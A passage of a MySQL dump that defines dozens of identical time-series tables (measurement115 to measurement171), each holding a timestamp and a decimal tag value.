) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement115`
--
DROP TABLE IF EXISTS `measurement115`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement115` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement116`
--
DROP TABLE IF EXISTS `measurement116`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement116` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement117`
--
DROP TABLE IF EXISTS `measurement117`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement117` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement118`
--
DROP TABLE IF EXISTS `measurement118`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement118` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement119`
--
DROP TABLE IF EXISTS `measurement119`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement119` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement12`
--
DROP TABLE IF EXISTS `measurement12`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement12` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement120`
--
DROP TABLE IF EXISTS `measurement120`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement120` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement121`
--
DROP TABLE IF EXISTS `measurement121`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement121` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement122`
--
DROP TABLE IF EXISTS `measurement122`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement122` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement123`
--
DROP TABLE IF EXISTS `measurement123`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement123` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement124`
--
DROP TABLE IF EXISTS `measurement124`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement124` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement125`
--
DROP TABLE IF EXISTS `measurement125`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement125` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement126`
--
DROP TABLE IF EXISTS `measurement126`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement126` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement127`
--
DROP TABLE IF EXISTS `measurement127`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement127` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement128`
--
DROP TABLE IF EXISTS `measurement128`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement128` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement129`
--
DROP TABLE IF EXISTS `measurement129`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement129` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement13`
--
DROP TABLE IF EXISTS `measurement13`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement13` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement130`
--
DROP TABLE IF EXISTS `measurement130`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement130` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement131`
--
DROP TABLE IF EXISTS `measurement131`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement131` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement132`
--
DROP TABLE IF EXISTS `measurement132`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement132` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement133`
--
DROP TABLE IF EXISTS `measurement133`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement133` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement134`
--
DROP TABLE IF EXISTS `measurement134`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement134` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement135`
--
DROP TABLE IF EXISTS `measurement135`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement135` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement136`
--
DROP TABLE IF EXISTS `measurement136`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement136` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement137`
--
DROP TABLE IF EXISTS `measurement137`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement137` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement138`
--
DROP TABLE IF EXISTS `measurement138`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement138` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement139`
--
DROP TABLE IF EXISTS `measurement139`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement139` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement14`
--
DROP TABLE IF EXISTS `measurement14`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement14` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement140`
--
DROP TABLE IF EXISTS `measurement140`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement140` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement141`
--
DROP TABLE IF EXISTS `measurement141`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement141` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement142`
--
DROP TABLE IF EXISTS `measurement142`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement142` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement143`
--
DROP TABLE IF EXISTS `measurement143`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement143` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement144`
--
DROP TABLE IF EXISTS `measurement144`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement144` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement145`
--
DROP TABLE IF EXISTS `measurement145`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement145` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement146`
--
DROP TABLE IF EXISTS `measurement146`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement146` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement147`
--
DROP TABLE IF EXISTS `measurement147`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement147` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement148`
--
DROP TABLE IF EXISTS `measurement148`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement148` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement149`
--
DROP TABLE IF EXISTS `measurement149`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement149` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement15`
--
DROP TABLE IF EXISTS `measurement15`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement15` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement150`
--
DROP TABLE IF EXISTS `measurement150`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement150` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement151`
--
DROP TABLE IF EXISTS `measurement151`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement151` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement152`
--
DROP TABLE IF EXISTS `measurement152`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement152` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement153`
--
DROP TABLE IF EXISTS `measurement153`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement153` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement154`
--
DROP TABLE IF EXISTS `measurement154`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement154` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement155`
--
DROP TABLE IF EXISTS `measurement155`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement155` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement156`
--
DROP TABLE IF EXISTS `measurement156`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement156` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement157`
--
DROP TABLE IF EXISTS `measurement157`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement157` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement158`
--
DROP TABLE IF EXISTS `measurement158`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement158` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement159`
--
DROP TABLE IF EXISTS `measurement159`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement159` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement16`
--
DROP TABLE IF EXISTS `measurement16`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement16` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement160`
--
DROP TABLE IF EXISTS `measurement160`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement160` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement161`
--
DROP TABLE IF EXISTS `measurement161`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement161` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement162`
--
DROP TABLE IF EXISTS `measurement162`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement162` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement163`
--
DROP TABLE IF EXISTS `measurement163`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement163` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement164`
--
DROP TABLE IF EXISTS `measurement164`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement164` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement165`
--
DROP TABLE IF EXISTS `measurement165`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement165` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement166`
--
DROP TABLE IF EXISTS `measurement166`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement166` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement167`
--
DROP TABLE IF EXISTS `measurement167`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement167` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement168`
--
DROP TABLE IF EXISTS `measurement168`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement168` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement169`
--
DROP TABLE IF EXISTS `measurement169`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement169` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement17`
--
DROP TABLE IF EXISTS `measurement17`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement17` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement170`
--
DROP TABLE IF EXISTS `measurement170`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement170` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Table structure for table `measurement171`
--
DROP TABLE IF EXISTS `measurement171`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
SET character_set_client = utf8mb4 ;
CREATE TABLE `measurement171` (
`Moment` datetime NOT NULL,
`Tagvalue` decimal(10,5) NOT NULL,
PRIMARY KEY (`Moment`),
UNIQUE KEY `Index_2` (`Moment`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
